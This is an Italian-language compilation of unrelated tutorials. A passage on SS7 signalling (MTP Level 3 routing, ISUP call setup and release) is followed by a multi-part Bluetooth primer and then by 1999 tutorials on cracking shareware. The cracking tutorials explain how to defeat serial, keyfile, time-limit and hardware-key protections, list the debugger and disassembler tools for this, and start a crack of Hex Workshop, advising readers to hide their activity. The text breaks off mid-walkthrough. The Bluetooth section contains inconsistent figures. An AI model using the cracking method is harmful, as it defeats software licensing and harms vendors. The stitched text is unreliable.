Per più informazioni vedere la descrizione di BIB di seguito. 


- MTP Livello 3. 


MTP Livello 3 provvede l'instradamento di messaggi attraverso i punti di 
segnale nella rete SS7. MTP Livello 3 è equivalente per funzioni all'OSI 
Network Layer . 

MTP Livello 3 instrada i messaggi basati sulle etichette di instradamento nel 
campo di informazione del segnale (SIF) delle unità di senale di messaggio. 
L'etichetta di instradamento comprende il destination point code (codice del 
punto di destinazione) (DPC), originating point code (codice del punto 
originante) (OPC), e signaling link selection (selezione del collegamento di 
segnale) (SLS). I codici di punto sono indirizzi numerici che identificano 
unicamente ogni punto di segnale nella rete SS7. Quando il codice del punto 
di destinazione in un messaggio indica il punto di segnale ricevente, il 
messaggio è distribuito alla parte di utenti appropriata (ad esempio, ISUP o 
SCCP) indicato dall'indicatore di servizio nel SIO. I messaggi destinati ad 
altri punti di segnale sono trasferiti visto che il punto di segnale 

ricevente ha capacità di trasferimento messaggi (come un STP). La selezione 
di collegamenti verso l'esterno è basata sull'informazione nel DPC e nell'SLS. 
Un'etichetta di instradamento ANSI usa 7 ottetti; un ITU-T ne usa 4. 


Figura 7. 
- ANSI contro ITU-T SIO e SIF. 


I codici di punto ANSI usano 24-bits (3 ottetti); i codici di punto ITU-T si 


servono usualmente di 14-bits. Per questa ragione, l'informazione di segnale 
scambiata tra reti ANSI e ITU-T dev'essere instradata attraverso un gateway 
STP, un convertitore di protocollo, o altri punti di segnale che abbiano 

codici di punto sia ANSI che ITU-T. (Nota: La Cina usa codici di punto 24-bit 
ITU-T che sono incompatibili sia con ANSI che con le altre reti ITU-T). 


L'interazione tra reti ANSI e ITU-T è inoltra complicata da diverse 
implementazioni di protocolli e procedure di più alto livello. 

Un punto di codice ANSI consiste di rete, cluster, e ottetti membri (ad 
esempio, 245-16-0). Un ottetto è un byte 8-bit che può contenere qualsiasi 
valore tra zero e 255. Telcos e altre grandi reti hanno singoli identificatori 
di rete, mentre gli operatori più piccoli hanno un singolo numero di cluster 
che hanno all'interno reti da 1 a 4 (e.g., 1-123-9). La rete numero 0 non è 
usata; la rete di numero 255 è riservata per uso futuro. 

I codici di punto ITU-T sono puri numeri binari che possono essere per zona, 
area/rete, e numeri che identificano i punti di segnale. Per esempio, il 
punto di codice 5557 (decimale) può essere dichiarato come 2-182-5 
(binario 010 10110110 101). 


Signaling Link Selection - Selezione del Collegamento di Segnale (SLS) 


La selezione dei collegamenti verso l'esterno è basata su informazioni nel 
DPC e nel campo di selezione del collegamento. L'SLS è uata per: 


* Assicura la sequenza del messaggio. Due messaggi mandati con lo stesso SLS 
arriveranno sempre a destinazione nello stesso ordine in cui erano stati 
mandati in origine. 

* Permette un uguale una condivisione del carico di traffico su tutti i 
collegamenti disponibili. In teoria, se una parte utente mandasse messaggi 
a intervalli regolari e assegnasse i valori dell' SLS in modo da mandare un 
messaggio collettivo da più mittenti, il livello di traffico dovrebbe 
essere uguale su tutti i collegamenti (entro set di collegamenti combinati) 
in quella destinazione. 


Nelle reti ANSI, la grandezza del campo SLS era originariamente 5 bits (32 
valori). In configurazioni con due collegamenti in ogni set di link di un set 
di link collegati (in totale 4 link), 8 valori SLS erano assegnati a ciascun 
link per permettere un pari bilancio di traffico. 


Un problema nacque quando le reti in crescita si approvigionarono set di 
collegamenti oltre 4 link. Con un SLS di 5 bit, una configurazione con 5 link 
in ciascun set di link di un set di collegamenti combinati (in totale 10 link) 
risulta un assegnamento irregolare di 3 valori SLS per 8 link e 4 valori SLS 
per i 2 link rimanenti. 

Per ovviare a questo inconveniente, sia ANSI che Bellcore adottarono un SLS a 
8-bit (256 valori) per fornire una migliore condivisione del carico sul 
collegamento. 

Nelle implementazioni ITU-T, l'SLS è interpretato come il codice di segnale 
del collegamento nei messaggi MTP. Nel messaggio della parte utenti telefono 
ITU-T, una porzione del codice di identificazione del circuito è immagazzinata 


nel campo dell'SLS. MTP Livello 3 reindirizza il traffico via dai link e i 
punti di segnale non funzionanti e controlla il traffico in caso di 

congestione. Comunque, una discussione dettagliata a riguardo è fuori dai 
propositi di questo tutorial. 

MTP Livello 2 e 1 possono essere sostituiti da ATM (Asynchronous Transfer 
Mode - Modo di trasferimento asincrono), un semplice protocollo broadband 
protocol che usa celle di lunghezza fissa di 53 ottetti. MTP Livello 3 si 
interfaccia ad ATM usando il Signaling ATM Adaptation Layer (SAAL). 
Questa interfaccia è tuttora in studio. 


- Parte Utente ISDN. 


La parte utente ISDN(ISUP) definisce il protocollo e le procedure usate per 
configurare, organizzare, e rilasciare i circuiti di collegamento che portano 
chiamate dati e voce attraverso la rete telefonica pubblica (PSTN). ISUP è 

usata sia per chiamate ISDN che per quelle non ISDN. Le chiamate che iniziano 
e terminano sullo stesso switch non usano il segnale ISUP. 


- Basic ISUP Call Control - Controllo di chiamata base ISUP. 


La figura 8 rappresenta il segnale ISUP associato a una chiamata base. Quando 
la chiamata è indirizzata a un numero fuori dallo switch, l'SSP originante 
transmette un messaggio di indirizzo iniziale (LAM) ISUP per riservare un 
circuito di collegamento dallo switch originante a quello di destinazione 

(1a). Lo IAM include il codice del punto originante , codice del punto di 
destinazione, codice di identificazione del circuito (circuito "5" in Fig. 8), 

le cifre digitate e, optionalmente, numero e nome della parte chiamante. 
Nell'esempio sotto, lo IAM è indirizzato dall'STP dello switch originante allo 
switch destinazione(1b). Nota che che lo stesso collegamento(i) è usato per 
la durata della chiamata finchè un errore del collegamento forza lo switch a 
usare un collegamento di segnale alternativo. 


Figura 8. 


Lo switch destinazione esamina il numero chiamato, determina ciò che serve 
alla parte chiamata, e la disponibilità della linea a squillare. Lo switch 
destinazione fa squillare la linea della parte chiamata e trasmette un 
messaggio di indirizzo completo (ACM) ISUP allo switch originante (2a) 
(attraverso il suo STP) per indicare che la fine remota del circuito di 
collegamento è stata riservata. L'STP indirizza l' ACM allo switch originante 
(2b) che manda un tono alla parte chiamante e la connette al circuito per 
completare il circuito voce fra parte chiamante e quella chiamata. 


Nell'esempio mostrato sopra, gli switch di origine e destinazione sono 
connessi direttamente con la linea principale. Se gli switches di origine e 
destinazione non sono connessi direttamente con la linea principale, lo 

switch originante trasmette un IAM per preservare un circuito di collegamento 
a uno switch intermedio. Questo manda un ACM mettere a conoscenza della 
richiesta di prenotazione del circuito e allora trasmette un IAM per 

preservare un circuito di collegamento a un altro switch. Questi processi 


continuano finchè tutte le linee per completare il circuito voce dallo switch 
originante a quello destinazione sono state prenotate. 


Quando la parte chiamata alza la cornetta, lo switch destinazione termina il 
tono di chiamata (tu tu) e trasmette un messaggio di risposta (ANM) ISUP allo 
switch originante attraverso il suo STP (3a). L' STP indirizza l' ANM allo 
switch originante (3b) che verifica che la linea della parte chiamata sia 
connessa alla linea riservata e, se così, inizia la tassazione. 


Se la parte chiamante riattacca prima, lo switch originante manda un 
messaggio di rilascio (REL) ISUP per rilasciare il circuito di collegamento 
tra gli switch (4a). L' STP indirizza il REL allo switch destinazione (4b). 
Se la parte chiamata riattacca prima, o se la linea è occupata, lo switch 
destinazione manda un REL allo switch originante indicando la causa di 
rilascio (ad esempio, normale riaggancio o occupato). 


Ricevendo il REL, lo switch destinazione disconnette il circuito di 
collegamento dalla linea della parte chiamata, mette il circuito in stato di 
inattività, e trasmette un messaggio di rilascio completo (RLC) ISUP allo 
switch originante (5a) per informare del rilascio del termine remoto del 
circuito di collegamento. Quando lo switch originante riceve (o genera) l' 

RLC (5b), lo switch termina il ciclo di tassazione e mette il circuito in 

stato di inattività in preparazione alla prossima chiamata. 

I messaggi ISUP possono anche essere trasmessi durante la fase di connessione 
della chiamata (ad esempio, tra i messaggi di risposta (ANM) e rilascio (REL) 
ISUP). 


- Formato dei Messaggi ISUP. 


L'informazione ISUP è portata nel campo informazioni di segnale (SIF) di un 
MSU. Il SIF contiene l'etichetta di instradamento seguita da un codice di 
identificazione del circuito (CIC) a 14-bit (ANSI) o 12-bit (ITU). Il CIC 

indica il circuito di collegamento riservato dallo switch originante per 

portare la chiamata. Il CIC è seguito dal campo tipo di messaggio (esempio, 
IAM, ACM, ANM, REL, RLC) che definisce i contenuti del resto del messaggio. 


Figura 9. 


Ciascun messaggio ISUP contiene la parte fissa ingiuntiva contenente 
ingiuntiva di lunghezza fissa. A volte la parte fissa ingiuntiva comprende 
solo il campo del tipo di messaggio. La parte fissa ingiuntiva può essere 
seguita dalla parte ingiuntiva variabile e/o dalla parte opzionale. La parte 
ingiuntiva variabile contiene parametri ingiuntivi di lunghezza variabile. 
La parte opzionale contiene parametri opzionali che sono identificati da un 
codice di parametro a 1 ottetto seguito da un indicatore di lunghezza 
("ottetti che seguono"). I parametri opzionali possono ricorrere in qualsiasi 
ordine. Se i parametri opzionali sono inclusi, la fine dei parametri opzionali 
è indicata da un ottetto contenente tutti zeri. 


Messaggio di indirizzo iniziale 


Un Messaggio di Indirizzo iniziale (LAM) è mandato "avanti" da ciascuno switch 
richiesto per completare il circuito tra parte chiamata e chiamante finchè il 
circuito connette allo switch destinazione. Un IAM contiene il numero della 
parte chiamata nella parte ingiuntiva variabile e può contenere nome e numero 
della parte chiamante nella parte opzionale. 


Figura 10. 
- La Parte per gli utenti di ISDN continua... 
- Messaggio con Indirizzo Completo. 


Un Messaggio con Indirizzo Completo (ACM) è mandato nella direzione opposta 
per indicare che l'estremità remota del circuito del collegamento è stata 
prenotata. 

Lo switch originante risponde all'ACM collegando la parte della linea 

chiamante al canale per completare il circuito voce dalla parte chiamante a 

quella chiamata. Lo switch originante manda anche un tono di suoneria alla 

parte chiamante. 


Figura 11. 


Quando la parte chiamata risponde, lo switch di destinazione termina il tono 

di suoneria e manda un Messaggio di Risposta (ANM) allo switch originante. Lo 
switch originante inizia a tassare dopo aver verificato che la linea della 

parte chiamante è connessa al canale prenotato. 


Figura 12. 


Un messaggio di Rilascio (REL) è mandato in entrambe le direzioni indicando 
che il circuito sta essendo rilasciato per l'indicatore di causa specificato. 

Un REL è mandato quando o la parte chiamante o quella chiamata chiude la 
conversazione (causa = 16). Un REL è anche mandato nella direzione opposta se 
la parte di linea chiamata è occupata (causa = 17). 


Figura 13. 


- Messaggio di Rilascio Completo. 

Un Messaggio di Rilascio Completo (RLC) è mandato nella direzione opposta del 
REL per attestare il rilascio dell'estremità remota di un circuito di 

collegamento e termina il ciclo di tassazione come appropriato. 


Figura 14. 

- Parte per gli utenti del telefono. 

In alcune parti del mondo (ad esempio la Cina), la Parte per gli Utenti del 
Telefono (TUP) supporta il processo di chiamata semplice. La TUP tratta solo 


circuiti analogici; i circuiti digitali e le capacità di trasmissione dati 
sono fornite dalla Parte per gli Utenti Dati. 
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Bluetooth prima parte 
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Lo scopo principale della nascita della tecnologia bluetooth risiede nella capacità di far dialogare e interagire fra 
loro dispositivi diversi (telefoni, stampanti, notebook, PDA, impianti HiFi, tv,computer, PC, cellulari, 
elettrodomestici, device, etc ) senza la necessità di collegamenti via cavo, ciò che va sotto il nome di wireless. 
Wireless si riferisce a una tipologia di comunicazione, ad un monitoraggio e a un insieme di sistemi di controllo in 
cui i segnali viaggiano nello spazio e non su fili o cavi di trasmissione.In un sistema wireless la trasmissione 
avviene principalmente via radiofrequenza (RF) o via infrarosso (IR). 
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Wireless consente in un ufficio, in una casa di far dialogare tra loro tutti i dispositivi elettronici presenti. Lo 
scambio di informazione fra gli strumenti avviene attraverso onde radio, eliminando qualsiasi tipo di connessione 
fisica tra dispositivi. Per fare ciò ciascun dispositivo deve possedere all'interno di un chip, integrato, in grado di 
trasmettere e ricevere informazioni nell'etere.All'interno del panorama Wireless il Bluetooth* è sicuramente una 
tecnologia che rivoluzionerà il mercato della connessione delle reti wireless, principalmente per i bassi costi di 
trasmissione su cui essa si basa e soprattutto per la possibilità di far comunicare qualunque tipo di dispositivo 
wireless attraverso onde radio. 


La tecnologia Bluetooth è specificatamente progettata per realizzare la comunicazione senza fili per apparecchi 
di piccole dimensioni. Il concetto chiave ispiratore di questa tecnologia è quello di eliminare completamente i cavi 
necessari alla comunicazione fra apparecchi, come abbiamo visto. 
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Tutte le apparecchiature bluetooth predisposte in un ambiente di lavoro sono nella condizione di generare piccoli 
network ( reti ) senza fili, cioè un'interconnessione di comunicazioni dati come ad esempio una rete di computer 
(Lan).Diversamente da una lan i dispositivi interconnessi non si limitano ai computer ma ad altri diversificati 
apparecchi elettronici come cellulari,cuffie, proiettori, scanner, videocamere, fotocamere, elettrodomestici 
vari.Questi collegamenti senza fili sono effettuati usando un ricetrasmettitore che opera nella frequenza di 2,4 
GHz, frequenza assegnata per usi industriali. 


Europe" & USA 2400 - 2483.5 MHz f= 2402 + k MHz 


Japan 2474 - 2497 MHz f= 2473 + k MHz 
Spain 2445 - 2475 MHz f= 2449 + k MHz 


France 2446.5 - 2483.5 MHz f= 2454 + k MHz 


Questi piccoli network wireless sono generalmente chiamati piconet.Un piconet è costituito da due o più 
periferiche che condividono un canale di comunicazione utilizzando Bluetooth , fino ad un massimo di 8 
dispositivi.La frequenza di 2,4 Ghz è sotto le frequenze UHF radio amatoriali che vanno dai 5,65 - 5,85 Ghz. Il 
sistema di comunicazione bluetooth è progettato per funzionare anche in ambienti con forte presenza di 
interferenze,campi elettromagnetci, ciò che va sotto il nome di elettrosmog, ciò per assicurare collegamenti 
sempre efficienti e affidabili.E' possibile ad esempio ascoltare musica dell' impianto stereo o della Tv tramite la 
cuffia senza fili anche se ci sono oggetti, ostacoli interposti, cosa impossibile con le cuffie a raggi infrarossi 
(tecnologia Irda). 

La velocità di comunicazione è prossima ad 1 Mbps anche con piccole potenze nell'ordine di alcuni milliWatt, 
impiegando la tecnologia TDD* (Time Division Duplex, nella gestione del traffico asimmetrico, come ad esempio 
per internet,e nel prossimo futuro con l' Umts, offre una mobilità limitata). 
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*TDD Time Division Duplex, Tecnologia impiegata nella gestione del traffico asimmetrico nell'UMTS come ad 
esempio la navigazione su internet,offre una mobilità limitata. 


* Il nome Bluetooth, deriva dal soprannome di un famoso condottiero scandinavo, re di Danimarca del medioevo, Harald Il Bluetooth 
che conquistò la Norvegia. 
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seconda parte 


Lo standard Bluetooth consente di creare delle Wpan (Wireless personal area networks)con diversi nuovi 
servizi. quelle che vengono definite "reti wireless individuali", ossia gruppi di dispositivi differenti tra loro 
collegati per soddisfare le esigenze del singolo. Bluetooth permette infatti di gestire sia i dati sia la voce, 
utilizzando una trasmissione a pacchetto su rete radio per i dati e una modalità connection-oriented per la 
voce. 
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| dispositivi dotati di questa tecnologia comunicano dunque tra loro creando e riconfigurando dinamicamente 
(la configurazione cambia infatti automaticamente quando si inserisce o si elimina un dispositivo) delle reti 
ad hoc (dette picoreti )composte da un massimo di otto nodi (più picoreti possono a loro volta 
interconnettersi, aumentando le possibilità di espansione).Ciò permette, ad esempio, di sincronizzare i dati di 
un Pc portatile e un Pda semplicemente avvicinando i due apparecchi, oppure di passare automaticamente 
al vivavoce quando si entra in auto parlando al cellulare. Tutto questo è possibile grazie al "service discovery 
protocol" ( SDP )che permette ad un dispositivo Bluetooth di determinare quali sono i servizi che gli altri 
apparecchi presenti nella picorete mettono a disposizione.Tale protocollo può fungere sia da server (ossia 
può essere interrogato da un altro dispositivo e rispondere con i propri servizi) sia da client (interrogando gli 
altri dispositivi) e ogni apparecchio dispone delle informazioni relative ai servizi di cui è capace e dei 
protocolli supportati: altri apparati potranno fare uso di queste informazioni per determinare le possibilità di 
interazione con i nodi della picorete.Questo è necessario perché, naturalmente, una stampante bluetooth 
non offrirà le stesse possibilità di un Pda o di un’auricolare, pertanto occorre che ogni nodo conosca le 
funzioni e le possibilità di ogni altro nodo della rete.Per fare un esempio concreto, se un telefonino Bluetooth 
vuole trasferire un messaggio di testo a un Pda, potrà interrogare quest'ultimo per sapere se è dotato di 
funzionalità e-mail, o se è in grado di ricevere un testo in altro modo.Quando un dispositivo si inserisce per 
la prima volta in una picorete, inoltre, effettuerà una "scansione" di tutti i nodi presenti per capire come può 
interagire con essi. 
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Bluetooth seconda parte 


Gli standard per le tecnologie Wireless* più utilizzati sono : 


DECT (Digital Enhanced Cordless Telecommunications).standard digitale criptato per telefonini cordless 
con possibilità di 120 canali su 12 frequenze, evoluzione del cordless analogico, implementa l'interfaccia 
Gap (Generic Access Profile) ed utilizza la modulazione GMSK, bit rate max 348 Kbps. 


IrDA (Infrared Device Application) tecnologia di interconnessione dati tramite infrarossi bidirezionale point-to- 
point tra dispositivi posizionati in visibilità reciproca LoS, line of sight, con range ridotto a 1 - 2 metri e bit 
rate di 4 Mbps 


IEEE 802.11 , tecnologia per le wireless Lan , con un'unica interfaccia a livello di Data Link e due possibili 
implementazioni a livello Psysical Layer (infrarosso, non applicato, trasmissione Dfir), e a onde radio con 
tecnologia FHSS e DSSS. Tale standard si articola in 802.11a operante a 5,8 Ghz e 40 Ghz e 802.11b 

operante a 2,4 Ghz e 11 Mbps, high rate. 


Bluetooth tecnologia di interconnessione wireless low-power (mWatt), in grado di far "comunicare" 
dispositivi elettronici come i telefoni, stereo, notebook,computer, pda fino ad un massimo di 16 dispositivi, 
attraverso onde radio a basso raggio emesse da alcuni trasmettitori presenti all'interno di questi dispositivi, 
di cui ci stiamo occupando. Bluetooth consente gestire sia i dati ( TD trasmissione dati) sia la voce (TV 
trasmissione voce), utilizzando una trasmissione a pacchetto su rete radio per i dati e una modalità 
connection-oriented per la voce. 


a cura del prof. Daniele Pauletto @ continua 


visita Tecnologia Wireless # 
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Bluetooth terza parte 


terza parte 


Gli elementi base di un sistema Bluetooth sono l' RU( unità radio) e l' BU ( unità base). 


| dispositivi comunicano tra loro in modo dinamico, la picorete si configura automaticamente quando si 
inserisce o si elimina un dispositivo. A loro volta più picoreti possono interconnettersi tra loro aumentando le 
possibilità di espansione. 


Banda di Frequenza | Classificazione Utilizzazione 
3- 30 Khz | VLF Very Low Frequency comunicazioni marittime 
30 Khz - 300 Khz LF LowFrequency à Ù " 


300 Khz - 3 Mhz MF Medium Frequency = 
emergenza 
3 Mhz - 30 Mhz HF High Frequency radioamatori - usi 
militari 


30 Mhz - 300 Mhz | VHF Very High Frequency TV - Radio Am - FM 


Bluetooth - ISM 


0,3 - 3 Ghz UHF Ultra High Frequency 
frequenze Industriale 


Scientifica Medica 


3 - 30 Ghz | SHF Super High Frequency Radar - Satelliti 
30 - 300 Ghz | EHF Extra High Frequency Radar - Satelliti 
1000 Ghz - 10.000.000 Ghz | Infrarossi - Ultravioletti 


Tale modalità di interconessione dinamica consente di sincronizzare i dati tra due apparecchi Bluetooth 
automaticamente, ad esempio un pda con un notebook, sfruttato l'SDP (Service Discovery Protocol )che 
abbiamo già visto,per distanze comprese tra 10 - 100 metri. 
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Bluetooth terza parte 


SDP Service Discovery Protocol 


richieste SDP 


risposte SDP 


Il protocollo consente di determinare le tipologie di servizi presenti e disponibili nella picorete sia in una 
modalità server sia client.Nella modalità server consentirà ad un dispositivo di interrogarlo sui servizi e 
protocolli supportati, quindi renderli disponibili, nella modalità client consentirà l'interrogazione dei dispositivi 
connessi alla picorete per avere informazioni. 


a cura prof. Daniele Pauletto @ continua 


visita Glossario Internet # 
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Bluetooth quarta parte 


quarta parte 


In un collegamento tutti gli apparecchi Bluetooth connessi sono generalmente in modalità standby, cioè di 
attesa, seguendo un ciclo di scansione ad intervalli di tempo al fine di verificare la presenza di eventuali altri 
dispositivi.La scansione effettuata può essere di due tipi: PS (Page Scan) e IS (Inquiry Scan). 


La scansione PS consente la la ricerca di un collegamento con un altro apparecchio Bleutooth, che può 
risultare in modalità connectable mode o non-connectable mode.La scansione IS simile alla precedente, 
permette di identificare la tipologia di apparecchi disponibili nella picorete, discoverable mode o non- 
discoverade mode, e di approntare i necessari protocolli per il collegamento. 


| risultati di una scansione sono : A ( Active ) la connessione è attiva, H ( Hold ) può svolgere operazioni 
IS e PS, S ( Sniff) riduzione del carico di lavoro , P ( Park) modalità di attesa.. 
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Bluetooth quarta parte 


Come abbiamo visto la tecnologia Bluetooth opera nella gamma di frequenza dai 2,4 ai 2,483 Ghz, 
suddivisa in canali da 1 Mhz impiegando la tecnica FHSS*.( Frequency Hopping Spread Spectrum, 
tecnologia che consente a più utenti di condividere lo stesso insieme di frequenze, cambiando 
automaticamente la frequenza di trasmissione fino a 1600 volte al secondo, al fine di una maggiore stabilità 
di connessione e di una riduzione delle interferenze tra canali di trasmissione)..Lo spectrum spreading 
consiste in una continua variazione di frequenza utilizzando una modulazione di frequency hopping.Gli 
hops corrispondono ai salti di frequenza all'interno della gamma assegnata ( 2,402 Ghz -2,480 Ghz, con 
salti di 1 Mhz, complessivamente 79 hops set). 


Due o più unità che condividono la stessa sequenza di hopping ( piconet ) vengono ad assumere tale 
configurazione 


PICONET 


Va 
© frequency hopping 


La comunicazione viene gestita dall'unità master tramite FHSS consentendo la sincronizzazione con le 
unità slave, fino ad un numero massimo di 7 dispositivi slave attivi.Nella piconet oltre alle sette unità slave 
attive possono rimanere sincronizzate con l'unità master altre unità in una modalità di attesa ( park ). 
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Bluetooth quarta parte 


a cura prof. Daniele Pauletto @ continua 


* FHSS Frequency Hopping Spread Spectrum, tecnologia che consente a più utenti di condividere lo 
stesso insieme di frequenze cambiando automaticamente la frequenza di trasmissione fino a 16000 volte al 
secondo. 


visita Dizionario Umts # 
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Bluetooth quinta parte 


quinta parte 


La tecnologia Bluetooth consente due principali modalità di collegamento tra unità master e slave, l'ACL e lo 
SCO.II collegamento ACL ( Asynchronous Connectionless) consente la trasmissione dei dati ( Td ) con una 
modalità sincrona. La velocità di trasmissione dati nella modalità asimmetrica sarà 723 Kbps - 57,6Kbps 
nell'altra direzione, nella modalità simmetrica invece, sarà pari a circa 434 Kbps.Il collegamento SCO ( 
Synchronous Connection Oriented ) consente una trasmissione radio ( Tr ) e una trasmissione Voce ( Tv 
).La velocità di trasmissione voce sincrona bidirezionale sfrutta una codifica voce Continuous Variable 
Slope Delta Modulation ( CVSD ) , permettendo un bit rate di 64 Kbps. 


O, trasmissione radio 
ZU __ | Je eine " 

trasmissione radio 

Tr 
Canali 
Bluetooth Ty trasmissione voce * 
% 8 . 
Su 


Td trasmissione dati 


# con codifica CYDS che consente un bit rate di 64 Kbps 


| dati di una piconet vengono trasmessi a pacchetti e sono composti da un AC ( Access Code ), da un H ( 
Header), e da un P ( Payload). 


ACCESS CODE 


#2 bit 


Pacchetto dati di una Piconet 


La modalità di trasmissione e ricezione dati può cambiare in relazione alle esigenze di comunicazione delle 
varie unità Bluetooth, passando per esempio da una sola comunicazione voce a una sola comunicazione 
dati.Una rete wireless composta da più apparecchi formerà una piconet, a sua volta più piconet formeranno 
un network wireless chiamato Scatternet. 
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Bluetooth quinta parte 


a cura prof. Daniele Pauletto @ continua 
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Bluetooth sesta parte 


sesta parte 


Una piccola rete Bluetooth può supportare un collegamento punto a punto ( point to pont ) e multi punto ( 
multipoint ). 


Ogni unità contiene all'interno più componenti: 
e l'unità radio 
e l'unità di controllo di collegamento ( link unit) 


e l'unità di gestione e di interfaccia del collegamento 
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Bluetooth sesta parte 


4 GHr | .-. | Bluetooth I 
dl controller 


| Link Manager sorveglia il collegamento tra i diversi dispositivi Bluetooth e verifica le procedurre di 
autenticazione e configurazione del collegamento, attraverso il contatto con un altro Link Manager. 


procedure connessione 


LMP protocol] 


Lo scambio delle informazioni avviene tramite il protocollo LMP ( Link Manager Protocol ) .Le informazioni 
dell 'LM possono essere di : trasmissione e ricezione dati, di autenticazione, di scansione ( page scan, 
inquiry scan, park hold sniff), di identificazione, di collegamento, di determinazione canale comunicativo, di 


verifica. 


a cura prof. Daniele Pauletto @ 2002 per Approfondire (#) 
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Bluetooth sesta parte 


LINK 


www.bluetooth.com 


www.motorola.com/bluetooth 


www.palowireless.com/bluetooth 


www.bluetoothcongress.com 


a cura prof. Daniele Pauletto @ 2002 
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Tutorial N°1  9-2-1999 
Cos'è il cracking? 


Con questa parola intendiamo l'arte del bypassare o disattivare i sistemi di 
protezione all'interno dei comuni shareware. 

Per intenderci faccio un piccolo esempio: 

In edicola compro un cd con dei programmi, ne installo uno a caso e noto subito 
che in alto c'è scritto: "Questo programma è una versione shareware". 

Cosa significherà questo oscuro messaggio? Bene ecco la risposta, il programma 
probabilmente avrà alcune funzioni disabilitate oppure ci porrà un limite di 
tempo entro il quale dovremmo pagare un contributo al produttore per riceverne 
una versione completa, infatti gli shareware sono nati per far provare al 
potenziale acquirente il nostro prodotto e, se esso vorrà poi utilizzarlo a tempo 
indeterminato dovrà pagare per ricevere un numero seriale che gli consentirà di 
disabilitare il limite di tempo (in genere 30, 45 o 90 giorni) oppure di abilitare 
tutte le funzioni che prima non erano disponibili. 

Le software house per velicizzare l'utilizzo dei propri prodotti spesso consentono 
di registrare il programma in linea, ma vediamo come avviene questo precesso, 
spesso si deve andare nel menu *Help* e poi *Register*, a volte il box di 
registrazione appare durante l'avvio del programma, a volte è "nascosto" come in 
gamehack dove si deve premere "ctrl+clic" sul logo "GameHack" per accedervi, 
oppure altre volte il box non esiste, infatti proprio per questo possiamo dividere i 
programmi shareware in due categorie ed altre varie sottocategorie, andiamo ad 
esaminarli: i tipi di shareware si possono dividere in registrabili e non, i 
registrabili possono essere *sbloccati* tramite un box nel quale và inserito un 
numero predefinito oppure calcolato in base al nome che inseriamo, o peggio 
tramite un Key file, ossia un file che la ditta spedisce all'utente e che va messo 
generalmente nella cartella principale del prog. (per esempio cuteftp cerca al 
proprio avvio un file chiamato "cuteftp.key" contenente le informazioni criptate 
dell'utente) quest'ultima soluzione è spesso la più difficile da sopraffare, ma 
vediamo come si comportano i prog. non registrabili, questa branca di shareware 
è nata recentemente per il solo motivo di depistare i cracker, infatti, i vari 
prodotti non forniscono un box di registrazione, ma consentono generalmente 
l'utilizzo completo del prog. per un determinato periodo di tempo oppure 
disabilitano alcune funzioni, a volte invece consentono di sfruttare a tempo 
illimitato il prog. senza disabilitare le funzioni ma riempiendolo di nag-screen 
(ossia noiosi messaggi che ricordano di pagare la registrazione e cazzi vari...) ce 
ne sarebbero altri due, nel primo *Verifica del cd-rom" l'eseguibile controlla la 
sua locazione che deve essere quella del cd originale, nel secondo tipo viene 
cercata una chiave hardware cioè viene fatto un check su una compente 
hardware del vostro pc, per esempio l'eseguibile controlla che il numero di serie 
dell'hard disk sia sempre quello ma come chiave hardware possiamo inrendere 
anche un dispositivo che si attacca alla porta parallela, poi ne parlerò in un altro 
tutorial (e saranno dolori...), in linea di massima tutti questi metodi possono 
essere superati, ne esamineremo con calma la maggior parte dei casi. 


Di cosa abbiamo bisogno 


Per poter crackare un prog abbiamo bisogno di un Debugger, un Disassembler 
un un editor esadecimale e volendo un paio di prg come regmon e filemon, 
vediamo a cosa servono: 

Il debugger è un po' la finestra sul programma del cracker, è indispensabile, il 
migliore è sicuramente Softice della Numega. 

La versione che troverete sarà l'ultima cioè la 3.24, un prog del genere serve a 
vedere il codice assembler del programma, se non sapete cosa significhi questa 


parola dovete far assolutamente riferimento ai tutorial di assembler per poter 
continuare; comunque il codice è lo scheletro del programma cioè la sua 
struttura, con questo prg possiamo *navigare* all'interno dello shareware per 
poterlo poi crackare. 
Il disassembler che useremo si chiama W32 Dasm ed è un prg molto simile al 
debugger, solo che quest'ultimo ci disassembla (cioè lo converte in assembly) un 
file e ci consente di trarne varie informazioni, il metodo di crackare un prg con 
un disassembler viene definito *passivo* perchè non si può interagire 
direttamente con le funzioni del prg. 
L'editor esadecimale, io uso Hex Workshop, serve per poter vedere il codice, 
come dice la parola stessa, esadecimale, quest'operazione viene in genere 
utilizzato per lo sviluppo del file crack, cioè un piccolo eseguibile che serve a 
modificare quanto basta il prg per renderlo libero dalla protezione. 
Regmon e Filemon sono invece due utilissimi prg che rispettivamente ci 
consentono di vedere ciò che un prg qualunque legge nel registro di windows e 
quali file legge, scrive o cerca. Spero che vi stiate chiedendo il perchè dell'utilità 
di questi due ultimi tools, ebbene eccovi la risposta, spesso uno shareware 
inserisce nel registro di windows o in alcuni file delle informazioni di vitale 
importanza come ad esempio i giorni che mancano prima dell'espirazione 
oppure le info sulla registrazione, le informazioni del reg. ed i file sono spesso 
nascosti in chissà quale directory e con filemon e regmon possiamo scovarli...;) 
Se volete ricercandoli o in questo sito o nel web. 
Scaricate tutti questi prog ed provate ad usarli uno per uno, ricordate solo che 
softice è FONDAMENTALE mentre gli altri potrete prenderli in un secondo 
momento. 
Un ultimo avvertimento: fare il cracker non è un'attività TROPPO legale quindi 
cercate di rimanere nell'ombra ed evitare di dire a tutti che vi chiamate Pinco 
Pallino, che vivete a Lilliput e che fate il cracker 24 ore al giorno, potrebbe 
essere molto pericoloso. 
Potete crackare in casa vostra tutti i programmi che volete al solo scopo 
didattico, ma non potete diffondere il relativo crack, quindi a buon 
intenditore..... 
Arrivederci al prossimo tutorial ;) 

Quequero 


Tutorial N°2  10-2-1999 
Il nostro primo crack!!! 


Eccoci di nuovo qui, in questo secondo tutorial crackeremo il nostro 
primo programa, ma quale? 
Bhè la risposta mi sembra ovvia, crackeremo uno dei nostri tools, cioè 
Hex Workshop 2.54, ma bando alle ciance ed iniziamo.... 
Avete insallato Softice e Hex Workshop? Se no l'avete fatto allora 
provvedete. 
Avviate il programma e un nag-screen vi dirà che questa è la prima volta 
che usate questo prodotto e che deve essere registrato, cliccate su ok e 
vedrete in alto a destra una scritta: "Demonstration version" passateci 
sopra con il mouse e vedrete che in realtà è un pulsante, bene bene 
cliccateci sopra e un box farà la sua comparsa chiedendovi un serial 
number; questa è la protezione che andremo a rimuovere... 
Premete ctrl+d e softice popperà sul monitor, come potrete subito 
constatare il mouse non c'è ma è sostituito da un quadratino bianco, se 
quel quandratino non si muove significa che avete sbagliato a settare la 
porta di comunicazione durante il setup, riavviate l'installazione e 
cambiate, tornate di nuovo in Softice (ctrl+d) e gurdatelo attenamente, 
noterete sicuramente delgli strani simboli e vedrete anche che durante 
